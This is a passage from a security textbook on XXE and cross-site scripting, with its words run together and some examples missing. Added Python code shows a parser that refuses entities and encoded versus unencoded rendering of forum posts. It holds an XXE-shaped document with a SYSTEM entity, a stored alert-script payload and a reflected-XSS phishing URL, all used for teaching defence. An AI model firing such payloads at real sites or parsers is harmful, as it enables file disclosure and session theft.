InternalPageOfcourse,doingthissortofresourcechecking,orportscanningifyouwill,isnottheonlythingyoucandowiththisapproach.Thebestwaytopreventagainstthissortofattackistodoinputvalidation.Inputvalidationshouldbedoneontheserverside.Youcandoinputvalidationontheclientside,butexpectthatitwillbebypassed.It’seasyenoughtouseaninterceptingproxyorevenanin-­browsertooltocapturerequestsandmodifythembeforesendingthemofftotheserver.Inexamplessuchasthis,simplynotallowinganyXMLtousetheexternalentitySYSTEMisastarttowardprotectingagainstthisattackbeingsuccessful.Anyactiontheapplicationhastoperformthroughthesystemshouldbedonedirectlybytheapplicationafterithasparsedthedata.Goingastepfurther,evaluatingifthereisawayaroundtheuseofanyexternalentitywouldbeuseful.Again,anyexternalneedshouldprobablybehandleddirectlybytheapplicationcodeafterithasproperlyevaluatedanydata.ThismeansalltheexternalentitiescouldbeignoredwhenparsingtheXML.AnexternalentityXMLattacktargetstheserver.Thiscouldbethewebserverortheapplicationserver,dependingonwhohandlesparsingtheXML.Cross-­SiteScriptingAcross-­sitescripting(XSS)attackisonethatusesthewebservertoattacktheclientside.Thisinjectsacodefragmentfromascriptinglanguageintoaninputfieldtohavethatcodeexecutedwithinthebrowserofauservisitingasite.Therearethreewaystorunacross-­sitescriptingattack.Theyalltargettheuser.Thedifferenceiswhetherthescriptisstoredsomewhereornot.Thefirsttype,storedontheserveranddisplayedforanyuservisitingapage,iscalledpersistentcross-­sitescripting.Thesecondiscalledreflectedcross-­sitescripting.ThelastmakesuseoftheDocumentObjectModel(DOM).You’llnotethatcro
ss-­sitescriptingisabbreviatedXSS,wheretheXisacross,ratherthanCSS,wheretheCisthefirstletterincross.Thereisanotherwebtechnology,CascadingStyleSheets,thatisabbreviatedCSS,whichcouldeasilybecomeconfusingiftheywerebothCSS.Allthreetypesmakeuseofascriptinglanguageinthesameway.Theattackerwoulduseashortscriptinsideablock.Forexample,theattackermayinjectintoaninputfield.Withpersistentcross-­sitescripting,thiswouldbeafieldwherethevalueisstoredontheserver.Aclassicexampleofthissortofattackisawebforumwhereausermaybeaskedforaname,anemailaddress,andthenacomment.Allofthevaluesfromthesefieldsinthewebformwouldbestored.Whensomeonecamebacktotheforum,theinformationwouldbedisplayed,includingthe484 Chapter12  Attackand Defense■script,whichwouldberunbythebrowser.Inthecaseofthepreviousexample,analertdialogboxwouldbedisplayedwiththewordwubbleinit.Whenitcomestoareflectedattack,thescriptisn’tstored.Instead,itisincludedinaURLyouwouldsendtoavictim.ThissortofURLwouldlooklikethis,andyoucanseethescriptpassedinasaparameter:http://www.badsite.com/foo.php?param=YouwouldsendthisURLtoavictimanddosomethingtogetthemtoclickit,suchassomethinglikesayingAppleisgivingawayfreeiPhonestothefirst1,000peopletoclickthislink.Thenyou’dmakethelinkrefertotheprecedingURL.YoucandothisinanHTMLemailusingthefollowingHTMLtag: Ourpartnerswillcollectdataandusecookiesforadpersonalizationandmeasurement.LearnhowweandouradpartnerGoogle,collectandusedata.AgreeCookies
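The XML external entity section above recommends refusing the SYSTEM entity, and external entities generally, when the server parses client data. Here is an added example (not from the book) of that server-side policy using Python's standard expat parser: any DOCTYPE, entity declaration or external entity reference aborts the parse before it can be acted on. The sample documents and the placeholder path are constructed for the example.

```python
import xml.parsers.expat as expat


class UnsafeXMLError(ValueError):
    """Raised when client XML uses a DOCTYPE or entity that we refuse to process."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse client-supplied XML into {element: text}, refusing any DOCTYPE,
    entity declaration or external entity reference. The application never
    needs a SYSTEM entity to fetch files or URLs for the client, so dropping
    the DTD outright removes the XXE surface (and entity-expansion bombs)."""
    result, stack = {}, []

    def refuse(what):
        raise UnsafeXMLError(f"{what} refused in untrusted XML")

    def start_element(name, attrs):
        stack.append(name)
        result.setdefault(name, "")

    def char_data(text):
        if stack:
            result[stack[-1]] += text

    parser = expat.ParserCreate()
    # Policy hooks: any DTD construct aborts the parse before it is acted on.
    parser.StartDoctypeDeclHandler = lambda name, *_: refuse(f"DOCTYPE {name!r}")
    parser.EntityDeclHandler = lambda name, *_: refuse(f"entity {name!r}")
    parser.ExternalEntityRefHandler = lambda ctx, base, sysid, pubid: refuse(f"external entity {sysid!r}")
    parser.StartElementHandler = start_element
    parser.EndElementHandler = lambda name: stack.pop()
    parser.CharacterDataHandler = char_data
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        raise UnsafeXMLError(f"malformed XML: {exc}") from exc
    return {k: v.strip() for k, v in result.items()}


def rejects(data: bytes) -> bool:
    """True if the hardened parser refuses the document."""
    try:
        parse_untrusted_xml(data)
    except UnsafeXMLError:
        return True
    return False


# Constructed samples (not from the book): a benign order, and a document shaped
# like the XXE listing, with a DOCTYPE declaring a SYSTEM entity for a placeholder path.
BENIGN = b"<order><item>widget</item><qty>3</qty></order>"
XXE_SHAPED = (b'<!DOCTYPE order [<!ENTITY ext SYSTEM "file:///placeholder/path">]>'
              b"<order><item>&ext;</item></order>")
```

Libraries such as Java's DocumentBuilderFactory and .NET's XmlReader expose equivalent switches to disallow DTDs; the policy, not the language, is the point.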
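For the persistent cross-site scripting forum example above, here is an added illustration (not from the book) of why the fix lives in the view rather than at the point of attack: the same stored name and comment rendered once with no output encoding and once with encoding chosen per context. The forum post values are constructed for the example.

```python
import html
from urllib.parse import quote

# Constructed forum submission (not from the book). The comment carries the
# alert script the persistent XSS example describes; the name lands in both
# an HTML text context and a URL query string.
POST = {
    "name": "mallory <b>",
    "comment": "<script>alert('wubble')</script>",
}


def render_post_vulnerable(post: dict) -> str:
    """Stored field values dropped straight into the page: every later visitor's
    browser runs the comment as script (persistent XSS)."""
    return (f"<div class='post'><b>{post['name']}</b>"
            f"<p>{post['comment']}</p>"
            f"<a href='/profile?user={post['name']}'>profile</a></div>")


def render_post_hardened(post: dict) -> str:
    """Same page with output encoding per context: HTML escaping for text (the
    browser shows the script source instead of running it) and URL encoding for
    the query string, so neither field can break out of its slot."""
    name = html.escape(post["name"], quote=True)
    comment = html.escape(post["comment"], quote=True)
    user_param = quote(post["name"], safe="")
    return (f"<div class='post'><b>{name}</b>"
            f"<p>{comment}</p>"
            f"<a href='/profile?user={user_param}'>profile</a></div>")


def contains_script_element(rendered: str) -> bool:
    """Crude check for the test: a literal <script tag in the output is what
    the browser would execute."""
    return "<script" in rendered.lower()
```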